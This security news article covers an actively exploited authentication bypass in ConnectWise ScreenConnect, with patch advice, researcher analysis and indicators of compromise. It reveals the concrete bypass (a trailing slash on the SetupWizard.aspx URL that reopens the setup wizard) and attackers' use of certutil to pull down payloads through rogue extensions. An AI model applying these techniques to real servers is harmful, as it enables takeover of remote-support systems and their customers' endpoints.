Critical ConnectWise ScreenConnect flaw exploited in the wild: Update

Critical ConnectWise ScreenConnect flaw exploited in the wild: Update

A critical vulnerability patched this week in the ConnectWise ScreenConnect remote desktop software is already being exploited in the wild. Researchers warn that it’s trivial to exploit the flaw, which allows attackers to bypass authentication and gain remote code execution on systems, and proof-of-concept exploits already exist.

ScreenConnect is a popular remote support tool with both on-premises and in-cloud deployments. According to ConnectWise’s advisory released Monday, the cloud deployments hosted at screenconnect.com or hostedrmm.com have automatically been patched, but customers need to urgently upgrade their on-premises deployments to version 23.9.8.

Data from internet scanning service Censys showed over 8,000 vulnerable ScreenConnect servers when the vulnerability was disclosed. However, the impact of a successful exploit could extend past the server itself since a single ScreenConnect server could provide attackers with access to hundreds or thousands of endpoints — even across multiple organizations if the server is run by a managed service provider (MSP).

Attackers have exploited vulnerabilities in remote monitoring and management (RMM) tools used by MSPs in the past to gain access to their customers’ networks, and they also abused such tools for command-and-control in other attacks. Last month, the US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory about a malicious campaign that involved phishing emails that led to the download of legitimate RMM software, such as ScreenConnect and AnyDesk, that attackers then used to steal money from victims’ bank accounts in a refund scam.

In its original advisory, ConnectWise said there was no evidence of the two vulnerabilities it disclosed being exploited in the wild, but one day later it updated its advisory to warn customers that: “We received updates of compromised accounts that our incident response team have been able to investigate and confirm.”

Authentication bypass in the ScreenConnect setup wizard

The ScreenConnect patch addresses two vulnerabilities that don’t yet have CVE identifiers: An authentication bypass that’s rated with the maximum score of 10 (Critical) on the CVSS severity scale and an improper limitation of a pathname to a restricted directory, also known as a path traversal flaw, that’s rated 8.4 (High).

Researchers from security firms Horizon3.ai and Huntress independently analyzed the patches and determined that the authentication bypass flaw is caused by attackers being able to access and run the initial setup wizard again on an existing deployment. One critical part of this setup wizard, which should only be run once when the software is deployed, is that it allows the customer to set the admin username and password. Therefore, by running it again, an attacker is able to reset the application’s user database and create a new administrative account with credentials they control.

The application already had code that was meant to block requests trying to access the SetupWizard.aspx page after the initial setup was complete, but the check was not strong enough and did not block all variants of the URL. “The use of string.Equals checks for exact equality, so a URL like <app_url>/SetupWizard.aspx will match,” researchers from Horizon3.ai said. “However, there are other URLs that resolve to SetupWizard.aspx that don’t match. If we simply add a forward slash to the end of the URL (<app_url>/SetupWizard.aspx/) we get access to the setup wizard, even after the application is already setup.”

This vulnerability is similar to one patched in January in Fortra GoAnywhere MFT, CVE-2024-0204, where attackers could similarly use a specially crafted request to reinitialize the original setup wizard and create their own administrative account. “The application’s Admin -> Audit page displays a list of recent login attempts along with the IP address,” the Horizon3.ai researchers said. “You can check this page for any unrecognized users or IP addresses.”

The Huntress team also released detection guidance and the ConnectWise advisory lists several IP addresses used by attackers so far as indicators of compromise.

Update: Exploit used to deploy malware via ScreenConnect extensions

Researchers from Bitdefender reported seeing attacks that exploited this vulnerability to deploy rogue ScreenConnect extensions with the goal of downloading additional malicious payloads. ScreenConnect supports custom extensions that allow users to customize their remote access and support experience with additional features and functionality.

Btdefender observed rogue files placed in the folder %ProgramFiles(x86)%ScreenConnectApp_Extensions with names such as iyrretkg.ashx, nsrtxeav.ashx and exirjllq.ashx. These files triggered detection events for Generic.Cert.Downloader.1, a detection signature in Bitdefender products for malware downloaders that make use of the Windows built-in certutil.exe tool. Bitdefender did not manage to obtain a copy of these files to analyze, but their MD5 signatures are available in the company’s report and can be used as indicators of compromise.

“Threat actors commonly employ this tool with the -urlcache or -f arguments, to initiate the download of additional malicious payloads onto the victim’s system,” the Bitdefender researchers said. “Considering the timing and the format of randomly generated filenames, these attacks could be based on one of the published POCs.”

Authentication, Cyberattacks, Vulnerabilities

Go to Source